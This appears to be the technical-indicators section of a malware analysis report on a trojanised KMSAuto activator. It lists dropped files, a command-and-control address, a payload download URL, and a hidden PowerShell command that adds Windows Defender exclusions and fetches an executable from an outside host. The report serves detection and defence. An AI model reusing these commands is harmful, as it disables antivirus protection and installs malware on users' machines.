Technical Information
- %TEMP%\kmsauro-x64\killduplicate.cmd
- %TEMP%\kmsauro-x64\kmsauto x64.exe
- %TEMP%\d64f2a9b-4389-40a4-8336-d7174dd105e0\agiledotnetrt64.dll
- %ALLUSERSPROFILE%\windowsdefenderupdater.exe
- %TEMP%\kmsauro-x64\killduplicate.cmd
- %TEMP%\kmsauro-x64\killduplicate.cmd
- %TEMP%\kmsauro-x64\kmsauto x64.exe
- '18#.#54.14.5':30000
- http://18#.##4.14.5:30000/tswv58ka/WindowsDefenderUpdater.exe via 18#.#54.14.5
- '%TEMP%\kmsauro-x64\kmsauto x64.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\KMSAuro-x64\KillDuplicate.cmd" "%TEMP%\KMSAuro-x64" "<File name>.exe""' (with hidden window)
- '%TEMP%\kmsauro-x64\kmsauto x64.exe' ' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' # # Добавление в исключения Add-MpPreference -ExclusionPath '%ProgramFiles%\' Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\' # URL и путь к файлу $FileUrl = 'http://185.154.14.5:30000...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\KMSAuro-x64\KillDuplicate.cmd" "%TEMP%\KMSAuro-x64" "<File name>.exe""